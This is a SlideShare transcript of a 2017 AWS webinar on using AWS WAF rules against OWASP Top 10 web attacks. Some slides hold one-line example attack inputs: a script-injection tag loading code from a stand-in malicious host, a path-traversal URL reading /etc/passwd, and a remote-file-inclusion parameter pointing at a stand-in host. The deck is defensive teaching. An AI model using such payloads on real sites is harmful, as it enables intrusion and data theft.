Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
© 2017, Amazon Web Services, Inc. or its Affiliates. All rights reserved.
Sundar Jayashekar, Sr. Product Manager
Vlad Vlas...
About Today’s Webinar
• AWS WAF Overview
• Mitigating Application Security
Vulnerabilities
• Overview of OWASP Top 10
• Mi...
What is AWS WAF?
• Protect websites and web
applications against common web
exploits
• Mitigate risks impacting applicatio...
WAF Positioning in the Spectrum of Attacks
DDoS
Targeted
attacks
WAF
Reflection and
amplification
Layer 3 & 4
floods
Slowl...
Implementing AWS WAF
Associations
Amazon CloudFront Application Load Balancer
Web ACLs
Ordered set of rules
Rules
Match se...
Strategies for Building a WAF Web ACL
• Blacklisting:
• Block bad patterns with rules, default action is: ALLOW
• More com...
OWASP Top 10 (2013 & 2017 RC)
Represents a broad consensus about what the most critical web application
security flaws are...
QuackyNature.com is the leading online retailer of Widgets
They are constantly under attack by malicious actors
trying to ...
Mitigating Application Security Threats
An application oriented approach:
Securing the specific application profile
Mitiga...
Using WAF to Mitigate OWASP Top 10
AWS WAF can mitigate application flaws
in the OWASP Top 10 categories
• A WAF does not ...
Know Your Specific Application Profile
Know your application in-depth, even if it’s a open
source/commercial off-the-shelf...
A1 – Injection
Injection flaw: application sends untrusted data to an interpreter, risk
of altering original intent of req...
A1 – Injection
Mitigate using AWS WAF SQL injection match conditions
• What HTTP request components should you scan?
• Que...
A3 – Cross-Site Scripting (XSS)
XSS flaw: include user-provided data in web pages without proper
sanitization. Malicious s...
A3 – Cross-Site Scripting (XSS)
Mitigate using AWS WAF cross-site scripting match conditions
• What HTTP request component...
A4 – Broken Access Control
Flaws due to lack/improper enforcement of restrictions on what users
are allowed to do:
• Manip...
A4 – Broken Access Control
• Filter dangerous patterns using string match conditions that might
indicate path traversal, f...
A5 – Security Misconfigurations
Default configurations aren’t always fit for purpose, recommended
defaults also change ove...
A5 – Security Misconfigurations
WAF mitigation strategies:
• Block or restrict access to paths for administrative consoles...
A7 – Insufficient Attack Protection
Category proposed & rejected in the 2017 release candidate review,
still contains valu...
A7 – Insufficient Attack Protection
WAF mitigation strategies:
• Use size constraint conditions to limit size of HTTP requ...
A9 – Components w/ Known Vulnerabilities
One of the most prevalent attack vectors
• Use of vulnerable components due to le...
Demo
Thank You!
Upcoming SlideShare
Loading in …5
×

How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks

5,450 views

Published on

The Open Web Application Security Project (OWASP) Top 10 identifies the most critical risks that web developers must address in their applications. AWS WAF, a web application firewall, helps you address the vulnerabilities identified by the OWASP Top 10. In this webinar, you will learn how to use AWS WAF to write rules to match common patterns of exploitation and block malicious requests from reaching your web servers.

  • Login to see the comments

How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks

  1. 1. © 2017, Amazon Web Services, Inc. or its Affiliates. All rights reserved. Sundar Jayashekar, Sr. Product Manager Vlad Vlasceanu, Solutions Architect 09/28/2017 Use AWS WAF to Mitigate OWASP’s Top 10 Web Application Vulnerabilities
  2. 2. About Today’s Webinar • AWS WAF Overview • Mitigating Application Security Vulnerabilities • Overview of OWASP Top 10 • Mitigating OWASP Top 10 Application Flaws Dive Deep: Whitepaper: Use AWS WAF to Mitigate OWASP’s Top 10 Web Application Vulnerabilities Toolkit: Companion CloudFormation Template containing example rules mitigating OWASP Top 10 vulnerabilities
  3. 3. What is AWS WAF? • Protect websites and web applications against common web exploits • Mitigate risks impacting application availability, security, or driving excessive resource consumption • HTTP protocol request filtering engine • Prevent attacks with recognizable request signatures • Meet regulatory compliance requirements Web App Database Your Application Good Users Bad Folks AWS WAF
  4. 4. WAF Positioning in the Spectrum of Attacks DDoS Targeted attacks WAF Reflection and amplification Layer 3 & 4 floods Slowloris SSL abuse HTTP floods SQL injection Bots and probes Application exploits Social engineering Reverse engineering XSS RFI/LFI Data Exposure
  5. 5. Implementing AWS WAF Associations Amazon CloudFront Application Load Balancer Web ACLs Ordered set of rules Rules Match sets as predicates Conditions Match sets • SQL Injection • Cross Site Scripting (XSS) • IP Blacklisting/Whitelisting • Request Hygene/Size Constraints • String Pattern Filtering • Standard Rules • Rate Based Rules (per 5min interval) • Actions: Block, Allow, Count • Perimeter protection
  6. 6. Strategies for Building a WAF Web ACL • Blacklisting: • Block bad patterns with rules, default action is: ALLOW • More commonly used • Whitelisting: • Allow good patterns with rules, default action is: BLOCK • Works best for defined limited pattern sets • Mixed: • Considerations: Rule ordering, bypass rules • Count effects: • Test pattern effectiveness with COUNT rule action
  7. 7. OWASP Top 10 (2013 & 2017 RC) Represents a broad consensus about what the most critical web application security flaws are A1 Injection A2 Broken Auth. & Session Mgmt. A3 Cross-Site Scripting (XSS) A4 Broken Access Control A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Insufficient Attack Protection A8 Cross-Site Request Forgery (CSRF) A9 Using Components with Known Vulnerabilities A10 Underprotected APIs 2013 - A10 Unvalidated redirects and forwards New New New
  8. 8. QuackyNature.com is the leading online retailer of Widgets They are constantly under attack by malicious actors trying to steal sensitive data, such as: payment information, customer, pricing or supplier information. You are their new Security Engineer tasked with protecting their data and mitigating attacks…
  9. 9. Mitigating Application Security Threats An application oriented approach: Securing the specific application profile Mitigate risks of exploiting QuackyNature.com application specific flaws (code, configurations, features) ✓ Keeping up with a changing landscape✓ Mitigating common attack vectors Protect QuackyNature.com from common attacks ✓
  10. 10. Using WAF to Mitigate OWASP Top 10 AWS WAF can mitigate application flaws in the OWASP Top 10 categories • A WAF does not fix the underlying flaws, it limits the ability to exploit them • Ability to derive recognizable HTTP request pattern is key to effectiveness • Ability to keep up with changes in attack patterns is important
  11. 11. Know Your Specific Application Profile Know your application in-depth, even if it’s a open source/commercial off-the-shelf product What services/URL paths does it expose to the web? Keep them all up-to-date, and install security patches timely Keep exposure footprint low 1 3 Know the packages, libraries, components your application is leveraging Additional features and services they expose 2
  12. 12. A1 – Injection Injection flaw: application sends untrusted data to an interpreter, risk of altering original intent of request Most well known are SQL Injection flaws Credit: XKCD: Exploits of a Mom, published by permission.
  13. 13. A1 – Injection Mitigate using AWS WAF SQL injection match conditions • What HTTP request components should you scan? • Query String, URI, Body, Cookie and/or Authorization Header • What transformations should you apply? • URL Decode, Decode HTML Entities • What about other injection types? • Use string match conditions
  14. 14. A3 – Cross-Site Scripting (XSS) XSS flaw: include user-provided data in web pages without proper sanitization. Malicious scripts or objects can be embedded in user pages Your Comment: SEND <script src=”https://malicious- site.com/exploit.js” type=”text/javascript” />
  15. 15. A3 – Cross-Site Scripting (XSS) Mitigate using AWS WAF cross-site scripting match conditions • What HTTP request components should you scan? • Body, Query String, Cookie Header, URI • What transformations should you apply? • URL Decode, Decode HTML Entities • What content types are allowed in HTTP request? • Risk of false positives if not HTML content
  16. 16. A4 – Broken Access Control Flaws due to lack/improper enforcement of restrictions on what users are allowed to do: • Manipulation of internal application objects • Component/Function-level access control issues • Path traversal attacks, local or remote file inclusion (LFI/RFI) Permission validation flaws are difficult to mitigate by any WAF without user context. https://example.com/download.php?file=..%2F..%2Fetc%2Fpasswd
  17. 17. A4 – Broken Access Control • Filter dangerous patterns using string match conditions that might indicate path traversal, file inclusion. • Limit access to administrative modules, or components to a known set of users from known locations using string match conditions and IP address match conditions
  18. 18. A5 – Security Misconfigurations Default configurations aren’t always fit for purpose, recommended defaults also change over time Examples • Leaving Apache’s ServerTokens Full in production • Leaving default directory listings enabled in production web servers • Application framework configuration that return stack traces in production • Bad/old insecure default configurations for runtimes, interpreters, etc…
  19. 19. A5 – Security Misconfigurations WAF mitigation strategies: • Block or restrict access to paths for administrative consoles, configuration or status pages, installed or enabled by default • Protect against known attack patterns specific to your platform, especially for legacy apps reliant on old platform behavior. Use string match conditions to match relevant patterns. http://example.com/?_SERVER[DOCUMENT_ROOT]=http://bad.com/bad.htm
  20. 20. A7 – Insufficient Attack Protection Category proposed & rejected in the 2017 release candidate review, still contains valuable lessons Key coverage: • HTTP request hygiene enforcement • Adaptability to changing attack patterns • Anomaly detection and reaction • Validation of control effectiveness
  21. 21. A7 – Insufficient Attack Protection WAF mitigation strategies: • Use size constraint conditions to limit size of HTTP request components to application relevant maximums • Use rate-based rules to detect abnormal request volumes, or changes in such volumes • Use AWS WAF Security Automations for capabilities reacting to abnormal conditions: • Scanner and probe mitigation • Known attacker origin mitigation (reputation lists) • Bot and scraper mitigation
  22. 22. A9 – Components w/ Known Vulnerabilities One of the most prevalent attack vectors • Use of vulnerable components due to legacy constraints • Use of vulnerable sub-components due to dependencies • Use of vulnerable components due to lack of flaw tracking/reporting Using WAF to mitigate: • Block HTTP requests to unused functionality of components • Block HTTP requests to server-side components in the public web path
  23. 23. Demo
  24. 24. Thank You!

×